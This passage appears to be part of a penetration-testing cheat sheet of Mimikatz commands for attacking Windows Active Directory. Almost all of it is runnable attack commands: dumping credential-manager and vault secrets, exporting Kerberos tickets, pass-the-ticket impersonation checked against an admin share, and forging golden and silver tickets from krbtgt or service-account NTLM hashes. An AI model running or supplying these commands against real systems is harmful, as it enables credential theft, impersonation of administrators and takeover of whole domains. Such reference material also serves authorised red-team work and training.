```bash privilege::debug sekurlsa::credman # or privilege::debug vault::cred ``` # Dump Tickets ```powershell # you will need to run the command prompt as an administrator # this will export all of the .kirbi tickets into the directory that you are in # or you can also use the base64 encoded tickets from Rubeus # when looking for which ticket to impersonate, it is recommended to look for an administrator ticket from the krbtgt .\mimikatz privilege::debug sekurlsa::tickets /export ``` # Pass the Ticket ```powershell .\mimikatz.exe # the command will cache and impersonate the given ticket kerberos::ptt <ticket> # verify that we successfully impersonated the ticket by listing our cached tickets klist # verify that you can look at the admin share dir \\<IP>\admin$ ``` # Golden / Silver Ticket Attack ```powershell # Golden ticket .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<NTLM> /id:500 # Silver ticket .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:<service_account> kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 # OR kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 /ptt misc::cmd ```